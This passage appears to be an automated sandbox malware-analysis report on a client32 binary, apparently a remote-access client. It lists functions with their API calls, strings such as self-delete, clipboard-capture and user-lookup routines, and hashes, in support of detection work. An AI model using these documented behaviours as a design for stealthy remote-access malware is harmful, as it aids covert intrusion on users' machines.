                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                              • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                              • API String ID: 2219718054-800295887
                                                                              • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                              • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                              Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                              • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                              • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                              • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                              • GetTickCount.KERNEL32 ref: 111472A0
                                                                              • GetTickCount.KERNEL32 ref: 111472C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                              • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                              • API String ID: 132346978-2450594007
                                                                              • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                              • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                              • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                              • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                              Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 11123836
                                                                              • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                              • IsIconic.USER32(?), ref: 111238C4
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Iconic$FreeInvalidateLibraryRect
                                                                              • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                              • API String ID: 2857465220-3401310001
                                                                              • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                              • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                              • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                              • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                              Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                              • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                              • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                              • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                              • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                              • IsIconic.USER32(00000001), ref: 110CB844
                                                                              • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                              • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 2655531791-1552842965
                                                                              • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                              • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                              • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                              • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                              Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                              • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                              • GetLastError.KERNEL32 ref: 110F3820
                                                                              • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                              • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                              • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                              • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                              • pSD, xrefs: 110F37C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                              • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                              • API String ID: 3134831419-838605531
                                                                              • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                              • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                              • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                              • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                              Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                              • API String ID: 0-293745777
                                                                              • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                              • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                              • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                              • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                              Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                              • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                              • String ID: NSMClassList$NSMFindClassEvent
                                                                              • API String ID: 1622498684-2883797795
                                                                              • Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                              • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                              • Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                              • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                              Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                              • GetClipboardData.USER32(?), ref: 1103337D
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                              • GetLastError.KERNEL32 ref: 11033406
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                              • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                              • API String ID: 1861668072-1296821031
                                                                              • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                              • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                              Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                              • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock
                                                                              • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                              • API String ID: 2752051264-327499879
                                                                              • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                              • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                              • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                              • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                              Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                              • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountIconicTick
                                                                              • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                              • API String ID: 1307367305-2838568823
                                                                              • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                              • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                              Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                              Download Yara Rule
